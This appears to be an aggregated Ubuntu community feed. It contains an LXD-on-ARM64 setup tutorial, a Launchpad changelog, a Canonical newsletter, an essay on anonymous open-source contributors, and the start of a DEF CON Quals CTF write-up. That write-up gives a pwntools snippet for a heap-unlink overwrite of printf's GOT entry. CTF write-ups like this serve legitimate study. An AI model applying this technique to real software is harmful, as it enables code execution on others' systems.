# Determine versions
arch="$(uname -m)"
release="$(uname -r)"
upstream="${release%%-*}"
local="${release#*-}"

# Get kernel sources
mkdir -p /usr/src
wget -O "/usr/src/linux-${upstream}.tar.xz" "https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-${upstream}.tar.xz"
tar xf "/usr/src/linux-${upstream}.tar.xz" -C /usr/src/
ln -fns "/usr/src/linux-${upstream}" /usr/src/linux
ln -fns "/usr/src/linux-${upstream}" "/lib/modules/${release}/build"

# Get the kernel's .config and Module.symvers files
wget -O "/usr/src/linux/.config" "http://mirror.scaleway.com/kernel/${arch}/${release}/config"
wget -O /usr/src/linux/Module.symvers "http://mirror.scaleway.com/kernel/${arch}/${release}/Module.symvers"

# Set the LOCALVERSION to the locally running local version (or edit the file manually)
printf 'CONFIG_LOCALVERSION="%s"\n' "${local:+-$local}" >> /usr/src/linux/.config

# Let's get ready to compile. The following are essential for the kernel module compilation.
apt install -y build-essential
apt install -y libssl-dev
make -C /usr/src/linux prepare modules_prepare

# Now, let's grab the latest spl and zfs (see http://zfsonlinux.org/).
cd /usr/src/
wget https://github.com/zfsonlinux/zfs/releases/download/zfs-0.6.5.9/spl-0.6.5.9.tar.gz
wget https://github.com/zfsonlinux/zfs/releases/download/zfs-0.6.5.9/zfs-0.6.5.9.tar.gz

# Install some dev packages that are needed for spl and zfs,
apt install -y uuid-dev
apt install -y dh-autoreconf
# Let's do spl first
tar xvfa spl-0.6.5.9.tar.gz
cd spl-0.6.5.9/
./autogen.sh
./configure      # Takes about 2 minutes
make             # Takes about 1:10 minutes
make install
cd ..

# Let's do zfs next
tar xvfa zfs-0.6.5.9.tar.gz
cd zfs-0.6.5.9/
./autogen.sh
./configure      # Takes about 6:10 minutes
make             # Takes about 13:20 minutes
make install

# Let's get ZFS loaded
depmod -a
ldconfig
modprobe zfs
zfs list
zpool list

And that’s it! The last two commands will show that there are no datasets or pools available (yet), meaning that it all works.

Setting up LXD

We are going to use a file (with ZFS) as the storage file. Let’s check what space we have left for this (from the 50GB disk),

root@scw-ubuntu-arm64:~# df -h /
Filesystem      Size  Used Avail Use% Mounted on
/dev/vda         46G  2.0G   42G   5% /

Initially, only 800MB was used; now it is 2GB. Let's allocate 30GB for LXD.

LXD is not already installed on the Scaleway image (some other VPS providers have LXD already installed). Therefore,

apt install lxd

Then, we can run lxd init. There is a weird situation when you run lxd init for the first time: it takes quite some time before the first questions appear (choose storage backend, etc). In fact, it takes 1:42 minutes before you are prompted for the first question. When you subsequently run lxd init, you get the first question at once. lxd init clearly does quite some work the first time around, and I did not look into what it is.

root@scw-ubuntu-arm64:~# lxd init
Name of the storage backend to use (dir or zfs) [default=zfs]: 
Create a new ZFS pool (yes/no) [default=yes]? 
Name of the new ZFS pool [default=lxd]: 
Would you like to use an existing block device (yes/no) [default=no]? 
Size in GB of the new loop device (1GB minimum) [default=15]: 30
Would you like LXD to be available over the network (yes/no) [default=no]? 
Do you want to configure the LXD bridge (yes/no) [default=yes]? 
Warning: Stopping lxd.service, but it can still be activated by:
  lxd.socket

LXD has been successfully configured.
root@scw-ubuntu-arm64:~#

Now, let’s run lxc list. This will create first the client certificate. There is quite a bit of cryptography going on, and it takes a lot of time.

ubuntu@scw-ubuntu-arm64:~$ time lxc list
Generating a client certificate. This may take a minute...
If this is your first time using LXD, you should also run: sudo lxd init
To start your first container, try: lxc launch ubuntu:16.04

+------+-------+------+------+------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+------+-------+------+------+------+-----------+

real    5m25.717s
user    5m25.460s
sys    0m0.372s
ubuntu@scw-ubuntu-arm64:~$

It is weird and warrants closer examination. In any case,

ubuntu@scw-ubuntu-arm64:~$ cat /proc/sys/kernel/random/entropy_avail
2446
ubuntu@scw-ubuntu-arm64:~$

Creating containers

Let’s create a container. We are going to do each step at a time, in order to measure the time it takes to complete.

ubuntu@scw-ubuntu-arm64:~$ time lxc image copy ubuntu:x local:
Image copied successfully!         

real    1m5.151s
user    0m1.244s
sys    0m0.200s
ubuntu@scw-ubuntu-arm64:~$

Out of the 65 seconds, 25 seconds was the time to download the image and the rest (40 seconds) was for initialization before the prompt was returned.

Let’s see how long it takes to launch a container.

ubuntu@scw-ubuntu-arm64:~$ time lxc launch ubuntu:x c1
Creating c1
Starting c1
error: Error calling 'lxd forkstart c1 /var/lib/lxd/containers /var/log/lxd/c1/lxc.conf': err='exit status 1'
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:220 - If you really want to start this container, set
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:221 - lxc.aa_allow_incomplete = 1
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:222 - in your container configuration file
  lxc 20170428125239.730 ERROR lxc_sync - sync.c:__sync_wait:57 - An error occurred in another process (expected sequence number 5)
  lxc 20170428125239.730 ERROR lxc_start - start.c:__lxc_start:1346 - Failed to spawn container "c1".
  lxc 20170428125240.408 ERROR lxc_conf - conf.c:run_buffer:405 - Script exited with status 1.
  lxc 20170428125240.408 ERROR lxc_start - start.c:lxc_fini:546 - Failed to run lxc.hook.post-stop for container "c1".

Try `lxc info --show-log local:c1` for more info

real    0m21.347s
user    0m0.040s
sys    0m0.048s
ubuntu@scw-ubuntu-arm64:~$

What this means, is that somehow the Scaleway Linux kernel does not have all the AppArmor (“aa”) features that LXD requires. And if we want to continue, we must configure that we are OK with this situation.

What features are missing?

ubuntu@scw-ubuntu-arm64:~$ lxc info --show-log local:c1
Name: c1
Remote: unix:/var/lib/lxd/unix.socket
Architecture: aarch64
Created: 2017/04/28 12:52 UTC
Status: Stopped
Type: persistent
Profiles: default

Log:

            lxc 20170428125239.730 WARN     lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:218 - Incomplete AppArmor support in your kernel
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:220 - If you really want to start this container, set
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:221 - lxc.aa_allow_incomplete = 1
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:222 - in your container configuration file
            lxc 20170428125239.730 ERROR    lxc_sync - sync.c:__sync_wait:57 - An error occurred in another process (expected sequence number 5)
            lxc 20170428125239.730 ERROR    lxc_start - start.c:__lxc_start:1346 - Failed to spawn container "c1".
            lxc 20170428125240.408 ERROR    lxc_conf - conf.c:run_buffer:405 - Script exited with status 1.
            lxc 20170428125240.408 ERROR    lxc_start - start.c:lxc_fini:546 - Failed to run lxc.hook.post-stop for container "c1".
            lxc 20170428125240.409 WARN     lxc_commands - commands.c:lxc_cmd_rsp_recv:172 - Command get_cgroup failed to receive response: Connection reset by peer.
            lxc 20170428125240.409 WARN     lxc_commands - commands.c:lxc_cmd_rsp_recv:172 - Command get_cgroup failed to receive response: Connection reset by peer.

ubuntu@scw-ubuntu-arm64:~$

Two hints here: some issue with process_label_set, and another with get_cgroup.

Let’s allow for now, and start the container,

ubuntu@scw-ubuntu-arm64:~$ lxc config set c1 raw.lxc 'lxc.aa_allow_incomplete=1'
ubuntu@scw-ubuntu-arm64:~$ time lxc start c1

real    0m0.577s
user    0m0.016s
sys    0m0.012s
ubuntu@scw-ubuntu-arm64:~$ lxc list
+------+---------+------+------+------------+-----------+
| NAME |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
+------+---------+------+------+------------+-----------+
| c1   | RUNNING |      |      | PERSISTENT | 0         |
+------+---------+------+------+------------+-----------+
ubuntu@scw-ubuntu-arm64:~$ lxc list
+------+---------+-----------------------+------+------------+-----------+
| NAME |  STATE  |         IPV4          | IPV6 |    TYPE    | SNAPSHOTS |
+------+---------+-----------------------+------+------------+-----------+
| c1   | RUNNING | 10.237.125.217 (eth0) |      | PERSISTENT | 0         |
+------+---------+-----------------------+------+------------+-----------+
ubuntu@scw-ubuntu-arm64:~$

Let’s run nginx in the container.

ubuntu@scw-ubuntu-arm64:~$ lxc exec c1 -- sudo --login --user ubuntu
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

ubuntu@c1:~$ sudo apt update
Hit:1 http://ports.ubuntu.com/ubuntu-ports xenial InRelease
...
37 packages can be upgraded. Run 'apt list --upgradable' to see them.
ubuntu@c1:~$ sudo apt install nginx
...
ubuntu@c1:~$ exit
ubuntu@scw-ubuntu-arm64:~$ curl http://10.237.125.217/
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
...
ubuntu@scw-ubuntu-arm64:~$

That’s it! We are running LXD on Scaleway and their new ARM64 servers. The issues should be fixed in order to have a nicer user experience.

Launchpad News: Launchpad news, November 2015 – April 2017

Well, it’s been a while!  Since we last posted a general update, the Launchpad team has become part of Canonical’s Online Services department, so some of our efforts have gone into other projects.  There’s still plenty happening with Launchpad, though, and here’s a changelog-style summary of what we’ve been up to.

Answers

  • Lock down question title and description edits from random users
  • Prevent answer contacts from editing question titles and descriptions
  • Prevent answer contacts from editing FAQs

Blueprints

  • Optimise SpecificationSet.getStatusCountsForProductSeries, fixing Product:+series timeouts
  • Add sprint deletion support (#2888)
  • Restrict blueprint count on front page to public blueprints

Build farm

  • Add fallback if nominated architecture-independent architecture is unavailable for building (#1530217)
  • Try to load the nbd module when starting launchpad-buildd (#1531171)
  • Default LANG/LC_ALL to C.UTF-8 during binary package builds (#1552791)
  • Convert buildd-manager to use a connection pool rather than trying to download everything at once (#1584744)
  • Always decode build logtail as UTF-8 rather than guessing (#1585324)
  • Move non-virtualised builders to the bottom of /builders; Ubuntu is now mostly built on virtualised builders
  • Pass DEB_BUILD_OPTIONS=noautodbgsym during binary package builds if we have not been told to build debug symbols (#1623256)

Bugs

  • Use standard milestone ordering for bug task milestone choices (#1512213)
  • Make bug activity records visible to anonymous API requests where appropriate (#991079)
  • Use a monospace font for “Add comment” boxes for bugs, to match how the comments will be displayed (#1366932)
  • Fix BugTaskSet.createManyTasks to map Incomplete to its storage values (#1576857)
  • Add basic GitHub bug linking (#848666)
  • Prevent rendering of private team names in bugs feed (#1592186)
  • Update CVE database XML namespace to match current file on cve.mitre.org
  • Fix Bugzilla bug watches to support new versions that permit multiple aliases
  • Sort bug tasks related to distribution series by series version rather than series name (#1681899)

Code

  • Remove always-empty portlet from Person:+branches (#1511559)
  • Fix OOPS when editing a Git repository with over a thousand refs (#1511838)
  • Add Git links to DistributionSourcePackage:+branches and DistributionSourcePackage:+all-branches (#1511573)
  • Handle prerequisites in Git-based merge proposals (#1489839)
  • Fix OOPS when trying to register a Git merge with a target path but no target repository
  • Show an “Updating repository…” indication when there are pending writes
  • Launchpad’s Git hosting backend is now self-hosted
  • Fix setDefaultRepository(ForOwner) to cope with replacing an existing default (#1524316)
  • Add “Configure Code” link to Product:+git
  • Fix Git diff generation crash on non-ASCII conflicts (#1531051)
  • Fix stray link to +editsshkeys on Product:+configure-code when SSH keys were already registered (#1534159)
  • Add support for Git recipes (#1453022)
  • Fix OOPS when adding a comment to a Git-based merge proposal without using AJAX (#1536363)
  • Fix shallow git clones over HTTPS (#1547141)
  • Add new “Code” portlet on Product:+index to make it easier to find source code (#531323)
  • Add missing table around widget row on Product:+configure-code, so that errors are highlighted properly (#1552878)
  • Sort GitRepositorySet.getRepositories API results to make batching reliable (#1578205)
  • Show recent commits on GitRef:+index
  • Show associated merge proposals in Git commit listings
  • Show unmerged and conversation-relevant Git commits in merge proposal views (#1550118)
  • Implement AJAX revision diffs for Git
  • Fix scanning branches with ghost revisions in their ancestry (#1587948)
  • Fix decoding of Git diffs involving non-UTF-8 text that decodes to unpaired surrogates when treated as UTF-8 (#1589411)
  • Fix linkification of references to Git repositories (#1467975)
  • Fix +edit-status for Git merge proposals (#1538355)
  • Include username in git+ssh URLs (#1600055)
  • Allow linking bugs to Git-based merge proposals (#1492926)
  • Make Person.getMergeProposals have a constant query count on the webservice (#1619772)
  • Link to the default git repository on Product:+index (#1576494)
  • Add Git-to-Git code imports (#1469459)
  • Improve preloading of {Branch,GitRepository}.{landing_candidates,landing_targets}, fixing various timeouts
  • Export GitRepository.getRefByPath (#1654537)
  • Add GitRepository.rescan method, useful in cases when a scan crashed

Infrastructure

  • Launchpad’s SSH endpoints (bazaar.launchpad.net, git.launchpad.net, upload.ubuntu.com, and ppa.launchpad.net) now support newer key exchange and MAC algorithms, allowing compatibility with OpenSSH >= 7.0 (#1445619)
  • Make cross-referencing code more efficient for large numbers of IDs (#1520281)
  • Canonicalise path encoding before checking a librarian TimeLimitedToken (#677270)
  • Fix Librarian to generate non-cachable 500s on missing storage files (#1529428)
  • Document the standard DELETE method in the apidoc (#753334)
  • Add a PLACEHOLDER account type for use by SSO-only accounts
  • Add support to +login for acquiring discharge macaroons from SSO via an OpenID exchange (#1572605)
  • Allow managing SSH keys in SSO
  • Re-raise unexpected HTTP errors when talking to the GPG key server
  • Ensure that the production dump is usable before destroying staging
  • Log SQL statements as Unicode to avoid confusing page rendering when the visible_render_time flag is on (#1617336)
  • Fix the librarian to fsync new files and their parent directories
  • Handle running Launchpad from a Git working tree
  • Handle running Launchpad on Ubuntu 16.04 (upgrade currently in progress)
  • Fix delete_unwanted_swift_files to not crash on segments (#1642411)
  • Update database schema for PostgreSQL 9.5 and 9.6
  • Check fingerprints of keys received from the keyserver rather than trusting it implicitly

Registry

  • Make public SSH key records visible to anonymous API requests (#1014996)
  • Don’t show unpublished packages or package names from private PPAs in search results from the package picker (#42298, #1574807)
  • Make Person.time_zone always be non-None, allowing us to easily show the edit widget even for users who have never set their time zone (#1568806)
  • Let latest questions, specifications and products be efficiently calculated
  • Let project drivers edit series and productreleases, as series drivers can; project drivers should have series driver power over all series
  • Fix misleading messages when joining a delegated team
  • Allow team privacy changes when referenced by CodeReviewVote.reviewer or BugNotificationRecipient.person
  • Don’t limit Person:+related-projects to a single batch

Snappy

  • Add webhook support for snaps (#1535826)
  • Allow deleting snaps even if they have builds
  • Provide snap builds with a proxy so that they can access external network resources
  • Add support for automatically uploading snap builds to the store (#1572605)
  • Update latest snap builds table via AJAX
  • Add option to trigger snap builds when top-level branch changes (#1593359)
  • Add processor selection in new snap form
  • Add option to automatically release snap builds to store channels after upload (#1597819)
  • Allow manually uploading a completed snap build to the store
  • Upload *.manifest files from builders as well as *.snap (#1608432)
  • Send an email notification for general snap store upload failures (#1632299)
  • Allow building snaps from an external Git repository
  • Move upload to FAILED if its build was deleted (e.g. because of a deleted snap) (#1655334)
  • Consider snap/snapcraft.yaml and .snapcraft.yaml as well as snapcraft.yaml for new snaps (#1659085)
  • Add support for building snaps with classic confinement (#1650946)
  • Fix builds_for_snap to avoid iterating over an unsliced DecoratedResultSet (#1671134)
  • Add channel track support when uploading snap builds to the store (contributed by Matias Bordese; #1677644)

Soyuz (package management)

  • Remove some more uses of the confusing .dsc component; add the publishing component to SourcePackage:+index in compensation
  • Add include_meta option to SPPH.sourceFileUrls, paralleling BPPH.binaryFileUrls
  • Kill debdiff after ten minutes or 1GiB of output by default, and make sure we clean up after it properly (#314436)
  • Fix handling of << and >> dep-waits
  • Allow PPA admins to set external_dependencies on individual binary package builds (#671190)
  • Fix NascentUpload.do_reject to not send an erroneous Accepted email (#1530220)
  • Include DEP-11 metadata in Release file if it is present
  • Consistently generate Release entries for uncompressed versions of files, even if they don’t exist on the filesystem; don’t create uncompressed Packages/Sources files on the filesystem
  • Handle Build-Depends-Arch and Build-Conflicts-Arch from SPR.user_defined_fields in Sources generation and SP:+index (#1489044)
  • Make index compression types configurable per-series, and add xz support (#1517510)
  • Use SHA-512 digests for GPG signing where possible (#1556666)
  • Re-sign PPAs with SHA-512
  • Publish by-hash index files (#1430011)
  • Show SHA-256 checksums rather than MD5 on DistributionSourcePackageRelease:+files (#1562632)
  • Add a per-series switch allowing packages in supported components to build-depend on packages in unsupported components, used for Ubuntu 16.04 and later
  • Expand archive signing to kernel modules (contributed by Andy Whitcroft; #1577736)
  • Uniquely index PackageDiff(from_source, to_source) (part of #1475358)
  • Handle original tarball signatures in source packages (#1587667)
  • Add signed checksums for published UEFI/kmod files (contributed by Andy Whitcroft; #1285919)
  • Add support for named authentication tokens for private PPAs
  • Show explicit add-apt-repository command on Archive:+index (#1547343)
  • Use a per-archive OOPS timeline in archivepublisher scripts
  • Link to package versions on DSP:+index using fmt:url rather than just a relative link to the version, to avoid problems with epochs (#1629058)
  • Fix RepositoryIndexFile to gzip without timestamps
  • Fix Archive.getPublishedBinaries API call to have a constant query count (#1635126)
  • Include the package name in package copy job OOPS reports and emails (#1618133)
  • Remove headers from Contents files (#1638219)
  • Notify the Changed-By address for PPA uploads if the .changes contains “Launchpad-Notify-Changed-By: yes” (#1633608)
  • Accept .debs containing control.tar.xz (#1640280)
  • Add Archive.markSuiteDirty API call to allow requesting that a given archive/suite be published
  • Don’t allow cron-control to interrupt publish-ftpmaster part-way through (#1647478)
  • Optimise non-SQL time in PublishingSet.requestDeletion (#1682096)
  • Store uploaded .buildinfo files (#1657704)

Translations

  • Allow TranslationImportQueue to import entries from file objects rather than having to read arbitrarily-large files into memory (#674575)

Miscellaneous

  • Use gender-neutral pronouns where appropriate
  • Self-host the Ubuntu webfonts (#1521472)
  • Make the beta and privacy banners float over the rest of the page when scrolling
  • Upgrade to pytz 2016.4 (#1589111)
  • Publish Launchpad’s code revision in an X-Launchpad-Revision header
  • Truncate large picker search results rather than refusing to display anything (#893796)
  • Sync up the lists footer with the main webapp footer a bit (#1679093)

Ubuntu Insights: Cloud Chatter: April 2017


Welcome to our April edition. We begin with our recent release of Ubuntu 17.04, which supports the widest range of container capabilities. We have a selection of Kubernetes webinars for you to watch, or you can get up to speed with some in-depth tutorials. Read about our exciting partnership announcements with Oracle, City Network, AWS and Unitas Global. Discover our plans for our upcoming presence at the OpenStack Summit in Boston next month. And finally, enjoy our roundup of industry news.

Ubuntu 17.04 supports widest range of container capabilities

This month marked the 26th release of Ubuntu, 17.04 ‘Zesty Zapus’, offering the most complete portfolio of container support in a Linux distribution. This includes snaps for singleton apps, LXD by Canonical for lightweight VM-style machine containers, and auto-updating Docker snap packages available in stable, candidate, beta and edge channels. The Canonical Distribution of Kubernetes 1.6, representing the very latest upstream container infrastructure, has 100% compatibility with Google’s hosted Kubernetes service, GKE.

Ubuntu 17.04 also includes OpenStack’s latest Ocata release, which is also available on Ubuntu 16.04 LTS via Canonical’s public Cloud Archive. Canonical’s OpenStack offering supports upgrades of running clouds without workload interruption. The introduction of Cells v2 in this release ensures that new clouds have a consistent way to scale from small to very large as capacity requirements change.

Furthermore, there is increased network performance for clouds and guests with the Linux 4.10 kernel. Learn more

GPUs and Kubernetes for Deep Learning

The Canonical Distribution of Kubernetes is the only distribution that natively supports GPUs, making it ideal for managing Deep Learning and media workloads. Our latest webinar discusses how such artificial intelligence can be achieved using Kubernetes, NVIDIA GPUs, and the operations toolbox provided by Canonical. Watch the webinar

Get up and running with Kubernetes

Our Kubernetes webinar series will be covering a range of operational tasks over the next few months. These will include upgrades, backups, snapshots, scalability, and other operational concerns that will allow you to completely manage your Kubernetes cluster(s) with confidence. The available webinars in the series so far include:

  • Getting started with the Canonical Distribution of Kubernetes – watch on-demand
  • Learn the secrets of validation and testing your Kubernetes cluster – watch on-demand
  • Painless Kubernetes upgrades – register now

Unitas Global and Canonical provide Fully-Managed Enterprise OpenStack

Unitas Global, the leading enterprise hybrid cloud solution provider, and Canonical announced they will provide a new fully managed and hosted OpenStack private cloud to enterprise clients around the world. This partnership, along with Unitas Global’s large ecosystem of system integrators and partners, will enable customers to choose an end-to-end infrastructure solution to design, build, and integrate custom private cloud infrastructure based on OpenStack. Learn more

OpenStack public cloud, from Stockholm to Dubai and everywhere between

City Network, a leading European provider of OpenStack infrastructure-as-a-service (IaaS), has joined the Ubuntu Certified Public Cloud programme. Through its public cloud service ‘City Cloud’, companies across the globe can purchase server and storage capacity as needed, paying for the capacity they use and leveraging the flexibility and scalability of the OpenStack platform. With dedicated and OpenStack-based City Cloud nodes in the US, Europe and Asia, City Network also recently launched in Dubai. Learn more.

Certified Ubuntu Images available on Oracle Bare Metal Cloud Service

Certified Ubuntu images are now available in the Oracle Bare Metal Cloud Services, providing developers with compute options ranging from single to 16 OCPU virtual machines (VMs) to high-performance, dedicated bare metal compute instances. This is in addition to the image already offered on Oracle Compute Cloud Service and maintains the ability for enterprises to add Canonical-backed Ubuntu Advantage Support and Systems Management. Oracle and Canonical customers now have access to the latest Ubuntu features, compliance accreditations and security updates. Learn more

Ubuntu on AWS gets serious performance boost with AWS-tuned kernel

Ubuntu Cloud Images for Amazon have been enabled with the AWS-tuned Ubuntu kernel by default. The AWS-tuned Ubuntu kernel will receive the same level of support and security maintenance as all supported Ubuntu kernels for the duration of Ubuntu 16.04 LTS. The most notable highlights for this kernel include: up to 30% faster kernel boot speeds, full support for the Elastic Network Adapter (ENA), increased I/O performance for i3 instances and more! Learn more

Ubuntu 12.04 goes end-of-life

Following the end-of-life of Ubuntu 12.04 LTS on Friday, April 28, 2017, Canonical is offering Ubuntu 12.04 ESM (Extended Security Maintenance), which provides important security fixes for the kernel and the most essential user space packages in Ubuntu 12.04. These updates are delivered in a secure, private archive exclusively available to Ubuntu Advantage customers on a per-node or per-hour basis.

For more information, read our FAQs or watch our latest webinar.

Preparing for a great show at OpenStack Summit Boston

We’ll be in Boston, from the 7th-12th May, at the OpenStack Summit. Join us at the Ubuntu booth and talk with us about your business’s cloud needs or find out about our cloud and container solutions, from LXD to Docker and Kubernetes with our featured demos. We’ll also be running some hands-on Telco and Container-specific workshops, as well as delivering a range of informative speaking sessions within the summit agenda. Book a meeting with our Executive Team or learn more about what we have planned.

Top posts from Insights

OpenStack, SDN & NFV

Containers & Storage

Big data / Machine Learning / Deep Learning

Jono Bacon: Anonymous Open Source Projects


Today Solomon asked an interesting question on Twitter:

He made it clear he is not advocating for this view, just a thought experiment. I had, well, a few thoughts on this.

I tend to think of open source projects in three broad buckets.

Firstly, we have the overall workflow in which the community works together to build things. This is your code review processes, issue management, translations workflow, event strategy, governance, and other pieces.

Secondly, there are the individual contributions. This is how we assess what we want to build, what quality looks like, how we build modularity, and other elements.

Thirdly, there is identity which covers the identity of the project and the individuals who contribute to it. Solomon taps into this third component.

Identity

While the first two components, workflow and contributions, are clearly important in defining what you want to work on and how you build it, identity is more subtle.

I think identity plays a few different roles at the individual level.

Firstly, it helps to build reputation. Open source communities are at a core level meritocracies: contributions are assessed on their value, and the overall value of the contributor is based on their merits. Now, yes, I know some of you will balk at whether open source communities are actually meritocracies. The thing is, too many people treat “meritocracy” as a framework or model: it isn’t. It is more of a philosophy…a star that we move towards.

It is impossible to build a meritocracy without some form of identity attached to the contribution. We need to have a mapping between each contribution and the same identity that delivered it: this helps that individual build their reputation as they deliver more and more contributions. This also helps them flow from being a new contributor, to a regular, and then to a leader.

This leads to my second point. Identity is also critical for accountability. Now, when I say accountability we tend to think of someone being responsible for their actions. Sure, this is the case, but accountability also plays an important and healthy role in people receiving peer feedback on their work.

According to Google Images search, “accountability” requires lots of fist bumps.

Open source communities are kinda weird places to be. It is easy to forget that (a) joining a community, (b) making a contribution, (c) asking for help, (d) having your contribution critically reviewed, and (e) solving problems all happen out in the open, for all to see. This can be remarkably weird and stressful for people new to or unfamiliar with open source, and it sits on top of the cornucopia of human insecurities about looking stupid, embarrassing yourself, and so on. While I have never been to one (honest), I imagine this is what it must be like going to a nudist colony: everything out on display, both good and bad.

All of this rolls up to identity playing an important role for building the fabric of a community, for effective peer review, and the overall growth of individual participants (and thus the network effect of the community).

Real Names vs. Handles

If we therefore presume identity is important, do we require that identity to be a real name (e.g. “Jono Bacon”), or can it be a handle (e.g. “MetalDude666” – not my actual handle, btw)?

We have all said this at some point.

In terms of the areas I presented above, such as building reputation, accountability, and peer review, this can all be accomplished if people use handles, provided there is some way of knowing that “MetalDude666” is the same person each time. Many gaming communities have players who build remarkable reputations and accountability without anyone knowing who they really are, just their handles.

Where things get trickier is assuring the same quality of community experience for those who use real names and those who use handles in the same community. On core infrastructure (such as code hosting, communication channels, websites, etc) this can typically be assured. It can get trickier with areas such as real-world events. For example, if the community has an in-person event, the folks with the handles may not feel comfortable attending so as to preserve their anonymity. Given how key these kinds of events can be to building relationships, it can therefore result in a social/collaborative delta between those with real names and those with handles.

So, in answer to Solomon’s question, I do think identity is critical, but it could be all handles if required. What is key is to either (a) require only handles/real names (which is tough), or (b) provide very careful community strategy and execution to reduce the delta of experience between those with real names and handles (tough, but easier).

So, what do you think, folks? Do you agree with me, or am I speaking nonsense? Can you share great examples of anonymous open source communities? Are there elements I missed in my assessment here? Share them in the comments below!

The post Anonymous Open Source Projects appeared first on Jono Bacon.

David Tomaschik: DEF CON Quals 2017: beatmeonthedl


I played in the DEF CON quals CTF this weekend, and happened to find the challenge beatmeonthedl particularly interesting, even if it was in the “Baby’s First” category. (DC Quals Baby’s Firsts aren’t as easy as one might think…)

So we download the binary and take a look. I’ve been using Binary Ninja lately; it’s a great tool from the Vector35 guys, and at the right price compared to IDA for playing CTFs. :) So I open up the binary, and notice a few things right away. This is an x86-64 ELF binary with essentially none of the standard security features enabled:

% checksec beatmeonthedl
[+] 'beatmeonthedl'
Arch:     amd64-64-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE

Easy mode, right?

Well, let’s look at the binary and see if we can find a vulnerability. It’s a pretty typical CTF binary: we can create, modify, delete, and print some notes. This has been seen many times in various forms.

At the beginning there’s a little twist: it prompts you for a username and password. It’s not hard to figure out what these should be, just take a look at the functions checkuser and checkpass. In checkuser you can see that the username should be mcfly. In checkpass, it’s interesting that the function copies the user input to an allocated buffer on the heap before checking the password, and all it checks is that it begins with the string awesnap. The memory chunk is not freed before continuing, and in fact, if you fail the login check, you get repeated chances that let you keep writing data to chunks on the heap. The copies are correctly bounds-checked, so there’s no memory corruption here. I’m not sure what the point of copying to the heap is, as I didn’t need it to solve the level.

Let’s take a look at the add_request function that creates the new request entries. Looking through it, we see it allocates a chunk for the request entry and then reads your request into the allocated chunk. It took me a moment to notice that there’s something strange about the malloc and the corresponding read of the request, but I’ve highlighted the relevant lines for your convenience.

malloc and read for new requests

Yep, it allocates 0x38 bytes and then reads 0x80 bytes into it. Well, that seems opportune, depending on what’s past the chunk I’m reading into. It doesn’t appear that this has any function pointers or vtable pointers (it appears to be pure C), so nothing like that to overwrite. Heap metadata corruption is a thing of the past, right? Well, if you notice that malloc is in blue and other functions (printf, read) are in orange, you might realize something. The malloc implementation used by this binary is compiled into the program. A quick test does, in fact, show that this version of malloc does not appear to run any validation checks on the heap metadata:

pwndbg> x/i $rip
=> 0x40656c <free+1096>:	mov    rax,QWORD PTR [rax+0x8]
pwndbg> i r rax
rax            0x41414141425e51a0	0x41414141425e51a0

So it seems like we can use the unlink technique described by Solar Designer in 2000 to exploit heap metadata corruption via free. If you’re not familiar with the technique, there’s a more digestible version here. This technique allows you to write one pointer-sized value at one address of your choosing. (Obviously, if you want to write more than one, you can sometimes repeat the technique if the circumstances allow.) Basically, you want to allocate two consecutive blocks, overflow the first into the second in such a way that the 2nd meets some special properties, and then free the first chunk, causing the malloc implementation to attempt to coalesce the two free blocks into a bigger block and unlink the old “free” block. A sketch of this crafted layout follows the list below. Our crafted block must:

  • Have zero size
  • Appear to be free (has the IN_USE bit cleared)
  • Appear as part of a linked list where the first pointer goes to your target address minus one pointer width (e.g., target-8 on x86-64).
  • Appear as part of a linked list where the second pointer is the value you want to write.
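
Here is a minimal sketch of that crafted block, mirroring the construction used by the full exploit at the end of this post. The exact fd/bk offsets depend on the allocator (the script below uses target-24 for this binary’s compiled-in malloc), and TARGET/VALUE are placeholders:

import pwn

TARGET = 0x609970             # where the write should land (printf@got, see below)
VALUE  = 0xdeadbeef           # placeholder for the pointer-sized value to write

fake  = pwn.p64(0)            # size field: zero, with the IN_USE bit clear
fake += pwn.p64(TARGET - 24)  # fd: unlink performs *(fd + 24) = bk, i.e. *TARGET = VALUE
fake += pwn.p64(VALUE)        # bk: the value that gets written; the mirror write of fd
                              # into the chunk at bk likely clobbers a few bytes near
                              # VALUE, which is why the exploit's shellcode opens with
                              # a short jump over a nop sled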

So if we know what we’re going to do, we should be done, right? Well, it’s not quite that simple – we still need to know what we’re going to write, and where we’re going to write it.

A common technique for this is to overwrite a pointer in the Global Offset Table (GOT). If you’re not familiar with the GOT, I’ve previously written about using the GOT and PLT for exploitation. Since there is no RELRO (Read-Only Relocations) on this binary, we can apply this technique here in a straightforward fashion. We can overwrite any function that will be called after the free occurs. For this binary, we can use any of several functions, but both puts and printf are excellent choices since they’re called in fairly short order (by printing the menu the next time).
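
For example, pwntools (which the exploit below already uses) can look the GOT slot up rather than hardcoding it; picking printf is my choice of target here, not something the binary dictates:

import pwn

elf = pwn.ELF('./beatmeonthedl')
print hex(elf.got['printf'])  # 0x609970 in this binary; writable since there is no RELRO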

So what do we write? Well, we want to point to some shellcode. But where is our shellcode? Since there aren’t many places to put things on the stack and there are no globals, I guess it’ll have to be the heap. We do have ASLR to contend with, so we need a leak of a heap address. It took me a while to realize how we could get this, but then I hit upon it: by creating fragmentation within the heap, the malloc implementation will have placed pointers for the circular linked list of free blocks into the free blocks themselves. Then, by overflowing an adjacent block right up to the pointer and printing the requests, we can read the value of the pointer. From that, we can round down to the start of the page and get the beginning of the heap area.
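
The rounding itself is a one-liner, assuming the usual 4 KiB pages (with leaked_ptr being the free-list pointer we just read out of the heap):

heap_base = leaked_ptr & ~0xfff  # mask off the low 12 bits to get the page start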

